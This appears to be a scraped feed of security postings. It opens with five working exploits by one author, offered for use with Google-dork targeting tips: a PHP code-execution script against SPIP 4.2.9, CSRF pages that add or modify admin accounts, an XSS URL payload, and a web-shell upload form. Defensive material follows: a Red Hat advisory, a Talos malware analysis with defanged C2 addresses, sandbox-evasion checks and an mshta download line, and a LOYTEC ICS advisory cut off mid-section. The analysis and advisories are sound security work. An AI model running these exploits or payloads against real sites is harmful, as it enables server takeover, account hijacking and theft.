SPIP version 4.2.9 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.9 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.9 Code Execution

Online Traffic Offense version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to create a file and inject PHP code.[+] save payload as poc.html [+] line 6,Set your target.[+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true);  xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 Cross Site Request Forgery

Penglead version 2.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : penglead v2.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Penglead 2.0 Cross Site Scripting

PPDB version 2.4-update 6118-1 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ppdb v2.4-update 6118-1 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 10. Set the target website link Save changes and apply . 

[+] infected file : /root/psb-user-update.php.

[+] save code as poc.html 

[+] payload : 

<div class="col-lg-6">  
                <h2 class="page-header">Administrator</h2>  
                    <div class="panel panel-default">  
                        <div class="panel-heading">  
                            User Profile   
                        </div>  
                          
                        <div class="panel-body">  
                            <div class="table-responsive">  
                <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data">  
                                <table class="table table-striped table-bordered table-hover">

                                                                      <tbody>

                             <tr>    
                    <td>Username</td>  
                    <td><input class="form-control" type="text" name="username" value="indoushka" required="">  
                    <input class="form-control" type="hidden" name="id" value="1"></td>  
                    </tr>

                    <tr>  
                    <td>Password</td>  
                    <td><input class="form-control" type="password" name="password" id="password" required=""></td>  
                    </tr>  
                    <tr>  
                    <td>Nama</td>  
                    <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td>  
                    </tr>

                    <tr>  
                    <td>Email</td>  
                    <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required="">  
                    <input type="hidden" name="level" id="level" value="1">  
                    </td>  
                    </tr>  
                    <tr>  
<td colspan="3"><input type="file" name="foto" id="foto" required=""></td>  
</tr>

                                            </tbody>  
                                </table>  
                                <button type="submit" class="btn btn-primary" name="update" id="update">Update</button>  
                                </form>  
                            </div>  
                              
                        </div>  
                          
                    </div>  
                      
                </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

PPDB 2.4-update 6118-1 Cross Site Request Forgery

Online Travel Agency System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Travel Agency System v1.0 Remote File Upload Vulnerability                                                           |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/online-travel-agency-system-using-php.html                                                   |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Employee Form</title>  
</head>  
<body>  
    <h2>Employee Form</h2>  
    <form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data">  
        <label for="userfile">Profile Picture:</label>  
        <input type="file" id="userfile" name="userfile" required><br><br>

        <input type="submit" name="employeeform" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Travel Agency System 1.0 Arbitrary File Upload

Red Hat Security Advisory 2024-6162-03 - An update for python-urllib3 is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6162.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-urllib3 security updateAdvisory ID:        RHSA-2024:6162-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6162Issue date:         2024-09-03Revision:           03CVE Names:          CVE-2024-37891====================================================================Summary: An update for python-urllib3 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37891References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292788

Red Hat Security Advisory 2024-6162-03

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

*   Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
*   MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
*   Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
*   These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
*   Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities  in any Cisco product telemetry.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. 

As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.

Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors. 

**Common characteristics of MacroPack VBA code**

The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. 

The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:

*   Function renaming.
*   Variable renaming.
*   Removal of surplus space characters.
*   Removal of comments.
*   Strings encoding.
*   Payload obfuscation.

A payload string deobfuscation function generated by MacroPack.

MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line. 

MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool. 

**Inclusion of non-malicious code**

A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents. 

At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources. 

Snippet of code taken from a Word programming book.

We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.

Non-malicious functions common for all discovered documents from the VBA examples website.

The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code. 

Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words. 

The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names. 

MacroPack author announced the random name generator based on valid English words on X (Twitter). 

This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.

Function and variable names generated by a Markov chain.

**MacroPack documents uploaded to VirusTotal**

Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests. 

For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows. 

All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors. 

Stages of execution for discovered MacroPack-generated documents.

**Theme 1: Lures uploaded from China**

The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English. 

__Chinese version of the lure.__

All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor. 

__English variant of the lure.__

**Theme 1 payloads**

Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It's free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems. 

The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.

First Havoc demon communication to C2, with appropriate HTTP headers specified in its configuration buffer.

After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.

The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL.  Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors. 

Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:

*   Deploy agents (called badgers) onto target systems.
*   Execute commands remotely.
*   Perform lateral movement within a network.
*   Establish persistence.
*   Evade detection by endpoint security solutions.

The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable. 

Brute Ratel configuration is decrypted by a RC4 decryption routine in the DLL badger.

**Theme 2: Pakistani military lures**

The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.

Pakistani military-themed document lure uploaded to VirusTotal in January 2024. 

The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption. 

The implant in the first document is configured to use DNS over HTTPs with dns\[.\]google and cloudflare-dns\[.\]com servers to tunnel the data over DNS for hosts dns1\[.\]s-logistics\[.\]net and dns2\[.\]s-logistics\[.\]net.

The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation. 

Pakistani military-themed document lure uploaded to VirusTotal in February 2024. 

One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.

Adobe Experience Cloud requests details from the second document.

**Theme 3: Lure uploaded from Russia**

A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see. 

The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual. 

__Partially deobfuscated second stage attempt to download and execute a file from a URL__

_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection. 

When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg. We have no indication that this TTP was successful. 

**Theme 3 payload**

At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage. 

__Before connecting to listen for commands, the C2 host and port are retrieved from PhantomCore data.__

Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command. 

**Theme 4: Uploaded from the U.S.**

 This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages. 

The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems. 

The second stage code will exit any the following conditions are satisfied:

*   Number of logical CPUs in the system is 1.
*   The User name is “USER”.
*   One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
*   The overall disk size is smaller than 60GB.
*   Total memory size is smaller than 1GB.
*   Word Application recent files count is smaller than three.

__Obfuscated function is checking for presence of analysis environment before downloading the payload.__

The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload. 

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63942.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

**Theme 1**

0cf1e59bae9dba7fbbf6ee6a36ca6bdb8fa0ac002b8cf824bd0888789a981c57 -64 bit Havoc demon

hxxps\[://\]122\[.\]114\[.\]141\[.\]214/qq\[.\]com/ab735a258a90e8e1f3e3dcf231bf53a9/mail/ - Havoc C2

93df1d60edd6b656b08e0fc0d31b330fd275f5e1a9069dfbb769e7ba217fcb6e - Brute Ratel loader

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/qazxsw -Brute Ratel C2

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/edcvfr

2131de0cb705afa52f88ef70a87ee6c8662d38db0138efc4940218ee62d8a296 - 32 bit Havoc demon

hxxp\[://\]122\[.\]114\[.\]166\[.\]92/Collectors/3\[.\]0/settings/mail/ - Havoc C2

**Theme 2**

cbafcf65b40d95e4699859a523ef4d300c57f93de6fbc6e194d1b922e9f3aba6 - PAF cyber team lure

b5608e73eb460944d9b523a940d94c95d3eb66d6a8efe82462e2589ccfaadb82 - allotment of plots, Pakistan military

dns1\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

dns2\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php - Brute Ratel C2

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net//HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

**Theme 3**

e1ee389b2af2d3a0eff4aa14f2ac3de6cdd4a73de80b5d450a44ec69cd332dbf - Excel malicious workbook

80731db97c33b50cd3d8727decec7e6a12bbf5f671527648c4cbb559fabc3074 - payload PhantomCore RAT

api.wilbderreis\[.\]ru - PhantomCore C2, using rsocket protocol on port 80

hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg

**Theme 4**

2c0a66c6370b4aa88ab3805d520e868cbc513b43119958257a72c9ff58ef241c - NMLS renewal theme maldoc

hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc

Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads

View CSAF
1. EXECUTIVE SUMMARY
CVSS v4 9.3
ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
Vendor: LOYTEC electronics GmbH
Equipment: LINX series
Vulnerabilities: Cleartext Transmission of Sensitive Information, Missing Authentication for Critical Function, Cleartext Storage of Sensitive Information, Improper Access Control
2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information or make modifications to an affected device.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following Loytec products are affected:
LINX-151: All versions
LINX-212: All versions
LVIS-3ME12-A1: All versions
LIOB-586: All versions
LIOB-580 V2: All versions
LIOB-588: All versions
L-INX Configurator: All versions
3.2 Vulnerability Overview
3.2.1 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319
LOYTEC LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices send password-change requests via cleartext HTTP.
CVE-2023-46380 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46380. A base score of 8.2 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
3.2.2 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306
LOYTEC LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices lack authentication for the preinstalled version of LWEB-802 via an lweb802_pre/ URI. An unauthenticated attacker can edit any project (or create a new project) and control its GUI.
CVE-2023-46381 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L).
A CVSS v4 score has also been calculated for CVE-2023-46381 . A base score of 8.8 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N).
3.2.3 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319
LOYTEC LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices use cleartext HTTP for login.
CVE-2023-46382 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46382. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
3.2.4 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319
LOYTEC electronics GmbH LINX Configurator 7.4.10 uses HTTP Basic Authentication, which transmits usernames and passwords in base64-encoded cleartext and allows remote attackers to steal the password and gain full control of LOYTEC device configuration.
CVE-2023-46383 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2023-46383. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.2.5 CLEARTEXT STORAGE OF SENSITIVE INFORMATION CWE-312
LOYTEC electronics GmbH LINX Configurator 7.4.10 is vulnerable to insecure permissions. Cleartext storage of credentials allows remote attackers to disclose admin password and bypass an authentication to log in.
CVE-2023-46384 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46384. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H).
3.2.6 CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319
LOYTEC electronics GmbH LINX Configurator 7.4.10 is vulnerable to Insecure Permissions. An admin credential is passed as a value of URL parameters without encryption, so it allows remote attackers to steal the password and gain full control of LOYTEC device configuration.
CVE-2023-46385 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46385. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H).
3.2.7 CLEARTEXT STORAGE OF SENSITIVE INFORMATION CWE-312
LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 firmware 7.2.4 are vulnerable to insecure permissions via registry.xml file. This vulnerability allows remote attackers to disclose smtp client account credentials and bypass email authentication.
CVE-2023-46386 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2023-46386. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H).
3.2.8 IMPROPER ACCESS CONTROL CWE-284
